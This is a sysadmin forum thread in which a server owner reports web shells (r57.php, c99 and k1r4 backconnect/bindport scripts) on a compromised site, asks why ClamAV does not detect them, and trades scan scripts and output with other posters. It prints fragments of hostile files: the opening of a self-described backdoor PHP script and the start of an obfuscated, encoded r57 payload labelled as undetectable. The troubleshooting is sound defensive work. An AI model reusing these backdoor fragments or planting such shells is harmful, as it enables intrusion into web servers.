clamav clamscan is not detecting r57.php or c99

questions

# ls
400.shtml 401.shtml 403.shtml 404.shtml 500.shtml balls cgi-bin logo.gif index.html r57.php
# pwd
/usr/home/soylandor1/domains/somedomainn.org/public_html
# clamscan -i

----------- SCAN SUMMARY -----------
Known viruses: 1131677
Engine version: 0.97.3
Scanned directories: 1
Scanned files: 8
Infected files: 0
Data scanned: 0.12 MB
Data read: 0.06 MB (ratio 1.88:1)
Time: 5.256 sec (0 m 5 s)
# clamscan -i -r ./

----------- SCAN SUMMARY -----------
Known viruses: 1131677
Engine version: 0.97.3
Scanned directories: 3
Scanned files: 23
Infected files: 0
Data scanned: 0.14 MB
Data read: 0.07 MB (ratio 1.89:1)
Time: 5.226 sec (0 m 5 s)
#
# ls balls
bd.pl c99sh_backconn.661.pl c99sh_bindport.329.pl c99sh_bindport.941.pl k1r4_backconn.682.pl k1r4_bindport.119.pl k1r4_bindport.536.pl k1r4_bindport.893.pl k1r4_bindport.968.pl
c2.php c99sh_bindport.115.c c99sh_bindport.749.pl k1r4_backconn.409.pl k1r4_backconn.887.pl k1r4_bindport.493.pl k1r4_bindport.616.pl k1r4_bindport.939.pl
#
# cd balls
# clamscan -i -r ./

----------- SCAN SUMMARY -----------
Known viruses: 1131677
Engine version: 0.97.3
Scanned directories: 1
Scanned files: 12
Infected files: 0
Data scanned: 0.02 MB
Data read: 0.01 MB (ratio 2.00:1)
Time: 5.274 sec (0 m 5 s)
#
 
If you manage to make ClamAV detect web shells, please let me know, as I've never ever before been able to find them with ClamAV.
 
Turn on verbose then so you can see exactly what it's checking. I have no problem scanning for c99 on any of my servers.

Here is the shell script I run:

Code:
#!/bin/sh

clear
echo
echo "Starting update process..."
echo
freshclam -v
echo
echo "Done."
sleep 4
clear
echo
echo "Starting scan process...This may take several hours...please be patient."
echo
cd / && clamscan -ir --exclude-dir=^/usr/ports/security/clamav --exclude-dir=^/sys --exclude-dir=^/dev --exclude-dir=^/proc --detect-pua=no --max-filesize=15M --scan-mail=no --log=/var/log/clamav/scanlog.log 
echo
echo "Done."
echo
 
# clamscan -r -i -v
Scanning /usr/home/somedomainn/domains/somedomainn.org/public_html/cgi-bin/.htaccess
Scanning /usr/home/somedomainn/domains/somedomainn.org/public_html/cgi-bin/foo.sh
Scanning /usr/home/somedomainn/domains/somedomainn.org/public_html/cgi-bin/bd.pl
Scanning /usr/home/somedomainn/domains/somedomainn.org/public_html/400.shtml
Scanning /usr/home/somedomainn/domains/somedomainn.org/public_html/401.shtml
Scanning /usr/home/somedomainn/domains/somedomainn.org/public_html/403.shtml
Scanning /usr/home/somedomainn/domains/somedomainn.org/public_html/404.shtml
Scanning /usr/home/somedomainn/domains/somedomainn.org/public_html/500.shtml
Scanning /usr/home/somedomainn/domains/somedomainn.org/public_html/hblogo9.gif
Scanning /usr/home/somedomainn/domains/somedomainn.org/public_html/index.html
Scanning /usr/home/somedomainn/domains/somedomainn.org/public_html/r57.php
Scanning /usr/home/somedomainn/domains/somedomainn.org/public_html/balls/bd.pl
Scanning /usr/home/somedomainn/domains/somedomainn.org/public_html/balls/c2.php
Scanning /usr/home/somedomainn/domains/somedomainn.org/public_html/balls/k1r4_bindport.968.pl
Scanning /usr/home/somedomainn/domains/somedomainn.org/public_html/balls/k1r4_bindport.493.pl
Scanning /usr/home/somedomainn/domains/somedomainn.org/public_html/balls/k1r4_bindport.939.pl
Scanning /usr/home/somedomainn/domains/somedomainn.org/public_html/balls/k1r4_bindport.119.pl
Scanning /usr/home/somedomainn/domains/somedomainn.org/public_html/balls/k1r4_bindport.893.pl
Scanning /usr/home/somedomainn/domains/somedomainn.org/public_html/balls/k1r4_bindport.616.pl
Scanning /usr/home/somedomainn/domains/somedomainn.org/public_html/balls/k1r4_bindport.536.pl
Scanning /usr/home/somedomainn/domains/somedomainn.org/public_html/balls/k1r4_backconn.887.pl
Scanning /usr/home/somedomainn/domains/somedomainn.org/public_html/balls/k1r4_backconn.409.pl
Scanning /usr/home/somedomainn/domains/somedomainn.org/public_html/balls/k1r4_backconn.682.pl

----------- SCAN SUMMARY -----------
Known viruses: 1131677
Engine version: 0.97.3
Scanned directories: 3
Scanned files: 23
Infected files: 0
Data scanned: 0.14 MB
Data read: 0.07 MB (ratio 1.89:1)
Time: 11.030 sec (0 m 11 s)
# cat ./balls/c2.php
<?php
// A robust backdoor script made by Daniel Berliner - http://www.qsdconsulting.com/ [3-15-2011]
// This code is public domain and may be used in part or in full for any legal purpose. I would still appreciate a mention though :).

function isLinux($path)
{
return (substr($path,0,1)=="/" ? true : false);
}
function getSlashDir($isLinux)

# cat r57.php
666
<?php /* WARNING: This file is protected encrypted via fud file no detecding. */
$o="QAFzOzh3b3cNKAAAVi0oBpAAMAAAFSckJwAQAFK/9wCAJwCSAFIAAAknBZ8AAAYnBGEAQQVxAEAAsSQDzwAABScCwf79CLMDkAAwAQMD3wAABScC0SQAUwB0BCED3wAABCcDFiQAEj
 
My Ubuntu desktop scans with an OK at the end, but my FreeBSD server has no OK at the end. Perhaps the hacker broke the server/ClamAV (I just installed ClamAV again last night on both the server and the Ubuntu desktop).


This is how my desktop looks when I scan with ClamAV:

admin1@admin1:~$ clamscan .
LibClamAV Warning: ***********************************************************
LibClamAV Warning: *** This version of the ClamAV engine is outdated. ***
LibClamAV Warning: *** DON'T PANIC! Read http://www.clamav.net/support/faq ***
LibClamAV Warning: ***********************************************************
LibClamAV Warning: ***********************************************************
LibClamAV Warning: *** This version of the ClamAV engine is outdated. ***
LibClamAV Warning: *** DON'T PANIC! Read http://www.clamav.net/support/faq ***
LibClamAV Warning: ***********************************************************
LibClamAV Warning: ***********************************************************
LibClamAV Warning: *** This version of the ClamAV engine is outdated. ***
LibClamAV Warning: *** DON'T PANIC! Read http://www.clamav.net/support/faq ***
LibClamAV Warning: ***********************************************************
./.dvdriprc: OK
./.recently-used: OK
./.openme.prefs: OK
./.dmrc: OK
./.odbc.ini: Empty file
./.DCP Builder: OK
./examples.desktop: OK
./.profile: OK
./.xsession-errors.old: OK
./.libquicktime_codecs: OK
./.printer-groups.xml: OK
./.sudo_as_admin_successful: Empty file
./.gtk-bookmarks: OK
./.ICEauthority: OK
./.esd_auth: OK
./.bash_logout: OK
./.bashrc: OK
./.bash_history: OK
./.gtk-recordmydesktop: OK
./clamscanlog.txt: OK
./.gksu.lock: Empty file
./.pulse-cookie: OK
./clipdat2.rdf: OK
./.ufrawrc: OK
./.xsession-errors: OK
./.recently-used.xbel: OK

----------- SCAN SUMMARY -----------
Known viruses: 1132278
Engine version: 0.96.5
Scanned directories: 1
Scanned files: 24
Infected files: 0
Data scanned: 1.69 MB
Data read: 0.91 MB (ratio 1.85:1)
Time: 4.835 sec (0 m 4 s)
 
They must not match any signature in the virus database, or your database is out of sync. Update the definitions with freshclam. If not, copy the files to your Ubuntu machine and see if they are caught.
 
You can see that my server has more viruses and a newer version than my desktop. I've seen many other examples of clamscan catching c99 and r57 on other forums. Some people say it will, some say it won't.
 